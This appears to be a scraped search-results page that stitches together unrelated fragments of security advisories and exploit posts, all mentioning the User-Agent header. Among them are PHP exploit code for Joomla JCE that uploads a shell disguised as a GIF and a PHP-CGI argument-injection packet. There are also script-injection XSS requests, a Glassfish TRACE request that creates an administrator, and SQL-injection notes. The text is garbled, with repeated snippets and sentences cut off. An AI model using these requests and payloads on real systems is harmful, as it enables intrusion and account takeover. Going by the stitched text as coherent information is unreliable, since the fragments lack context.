Next Page >>
User/Agent
EXPOSURE: Web Filtering Bypass
SYNOPSIS
========
By spoofing the User-Agent header it is possible to bypass filtering
and,
to a lesser extent, monitoring in a Websense Enterprise 6.3.1
environment.
PROOF OF CONCEPT
EXPOSURE: Web Filtering Bypass
SYNOPSIS
========
By spoofing the User-Agent header it is possible to bypass filtering and,
to a lesser extent, monitoring in a Websense Enterprise 6.3.1 environment.
PROOF OF CONCEPT
================
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
2. Cross-site Scripting vulnerability in
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.
else
$this->msg('Ok, using IP '.$this->s_ip, 1);
}
}
# User-Agent filter ?
if( $this->conf['browser'] === '1' && !$this->s_admin )
{
$this->s_bypass = true;
$this->msg('Trying to find a valid user-agent', 0);
Request #1
----------
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
--------------
Vulnerability:
--------------
Execution of arbitrary code is possible by executing sarg with
specially crafted squid log files (access and useragent log).
The access.log has to be manually created to trigger the exploit,
as squid will not allow malformed HTTP methods.
The useragent log is more critical, as this vulnerability can be
(Authenticated sender: hfortier) by mail.recon.cx (Postfix)
with ESMTPSA id 24588D6170
Message-ID: <4F0C8FE0.4000508@recon.cx>
Date: Tue, 10 Jan 2012 14:22:08 -0500
From: Hugo Fortier <hfortier@recon.cx>
User-Agent: Unknown
MIME-Version: 1.0
To: "info@recon.cx" <info@recon.cx>
Subject: Yo
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
"trustwave" to the administrative user group.
#Request
GET /cgi-bin/userprefs.cgi?newUser=trustwave&pwd=trustwave&selectedUserGroup=1&= HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
/* Packet 1 --> Checking Exploitability */
$packet = "GET
".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
sendpacket($packet,1,0,1);
/* Packet 2 --> Uploading shell as a gif file */
dumping the database, install modules (PHP code execution) and so on.
CubeCart is using a MySQL table named CubeCart_admin_users for storing
information about administrative users.
When an administrator logs in, the applications stores his session ID,
browser (user agent) and IP address in the sessId, browser and sessIP
fields.
> SELECT adminId, username, sessId, browser, sessIp FROM
CubeCart_admin_users C;
1, 'admin', '9a58f70e7ded1bcb568b02815a1c4a56', 'Mozilla/5.0 (Windows;
U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko)
Title: RunCMS XSS Vulnerability via User Agent
Vendor: RunCMS
Product: RunCMS
Tested Version: 2.1
Threat Class: XSS
Severity: Medium
Remote: yes
Local: no
Discovered By: Andrei Rimsa Alvares
Tested on:
Windows Vista Version Service Pack 1 Build 6001
Processor Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz,
2401 Mhz, 2 Core(s), 2 Logical Processor(s)
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US;
rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6
(.NET CLR 3.5.30729)
============================================================
============================================================
?>";
$packet = "POST
".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: PHP CGI Argument Injection Exploiter\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n\r\n";
$packet .= $payload."\r\n\r\n\r\n\r\n";
sendpacket($packet,1,0,0);
> Tested on:
> Windows Vista Version Service Pack 1 Build 6001
> Processor Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz,
> 2401 Mhz, 2 Core(s), 2 Logical Processor(s)
>
> User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US;
> rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6
> (.NET CLR 3.5.30729)
> ============================================================
This is the firefox user agent string...
3.
POST /index.php?checknum=876029936871&msg=doLogin HTTP/1.1 (!)
Host: demo.eyeos.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Html tags were removed from the advisory during the submission process. Hopefully the following advisory will correct this.
Title: RunCMS XSS Vulnerability via User Agent
Vendor: RunCMS
Product: RunCMS
Tested Version: 2.1
Threat Class: XSS
Severity: Medium
COMPLETE HTTP REQUEST for simple XSS PoC:
GET
/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22
HTTP/1.1
User-Agent: curl/7.15.4 (i486-pc-linux-gnu) libcurl/7.15.4
OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.3
Host: target-domain.foo
Accept: */*
Acunetix-Aspect: enabled
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
2. Cross-site Scripting vulnerability in
“/zenphoto_1_3/zp-core/admin.php”, parameter “from”.
Problem Description:
A stack-based buffer overflow in sarg (Squid Analysis Report Generator)
allowed remote attackers to execute arbitrary code via a long Squid
proxy server User-Agent header (CVE-2008-1167).
A cross-site scripting vulnerability in sarg version 2.x prior to
2.2.5 allowed remote attackers to inject arbitrary web script or
HTML via the User-Agent heder, which is not properly handled when
displaying the Squid proxy log (CVE-2008-1168).
COMPLETE HTTP REQUEST for simple XSS PoC:
GET
/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22
HTTP/1.1
User-Agent: curl/7.15.4 (i486-pc-linux-gnu) libcurl/7.15.4
OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.3
Host: target-domain.foo
Accept: */*
COMPLETE HTTP REQUEST for simple XSS PoC:
GET
/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22
HTTP/1.1
User-Agent: curl/7.15.4 (i486-pc-linux-gnu) libcurl/7.15.4
OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.3
Host: target-domain.foo
Accept: */*
Cookie: webmailSession=0; cookieTest=cookiesEnabled; checkOverQuota=0;
passwordExpireWarning=0
Host: 192.168.0.222:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
While investigating this alert, I've discovered that this vulnerability
is more serious than I initially expected. This is a very serious
vulnerability because using information from the log files it's possible
to gather enough information to read the file containing all the emails
Vulnerability description:
There are vulnerabilities in two integration modules in Subdreamer. Both Invision Power Board 2 and phpBB3 integration modules have this vulnerability.
Both bulletin board systems store browser user-agent string in the sessions table used to track currently logged in users.
The user-agent string is passed as-is from HTTP headers without any validation / escaping. This opens up a possibility for SQL Injection attacks.
Possible exploits:
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
COMPLETE HTTP REQUEST for simple XSS PoC:
GET
/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22
HTTP/1.1
User-Agent: curl/7.15.4 (i486-pc-linux-gnu) libcurl/7.15.4
OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.3
Host: target-domain.foo
Accept: */*
POST /dokeos/main/create_course/add_course.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Content-Length: 107
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/dokeos/main/create_course/add_course.php
title=1234&category_code=PROJ&wanted_code=1234&course_language=slovenian&_qf__add_course=&
Discovered by: David Vieira-Kurz
http://www.majorsecurity.info
Affected Products:
============
Motorola Milestone(Droid) smartphone Browser with following useragent:
Mozilla/5.0 (Linux; U; Android 2.0; de-de; Milestone Build/SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17
Original Advisory:
============
http://www.majorsecurity.info/index_2.php?adv=major_rls65
There is a known authentication bypass in Glassfish, by using a TRACE method rather than a GET method it is possible to access data meant only for Glassfish administrators.
The following requests were used to create a new Glassfish administrator:
TRACE /common/security/realms/manageUserNew.jsf?name=admin-realm&configName=server-config&bare=true HTTP/1.1
Host: 10.65.78.211:4848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
>
> A reply from Robert Hensing at Microsoft
> (http://blogs.technet.com/robert_hensing/archive/2008/07/01/vulnerable-w
> eb-browser-study-full-of-fail.aspx) says that your study did not include
> minor version information for Internet Explorer, probably because such
> information is not reported in the user-agent string. But fully-patched
> copies of IE5 and IE6 are not insecure in the same way as an unsupported
> version; Microsoft is still supporting them.
>
> So is it true that your study calls anyone running IE7 secure, and
> anyone running IE5 or IE6 insecure, regardless of their patch levels?
- -------
Class: Cross-Site Scripting
Versions: 2.17.1 and above
Description: Bugzilla does not properly escape the 'buildid' field in
the guided form when filing bugs. From 2.17.1 till 2.23.3,
this field was based exclusively on the User-Agent string
returned by your web browser. Since 2.23.4, this parameter
can be defined in the URL passed to enter_bug.cgi,
overwriting the User-Agent string and may lead to cross-site scripting.
The guided form is not usually used by Bugzilla
installations, as it is shipped only as an example to be modified for
Next Page>>
|
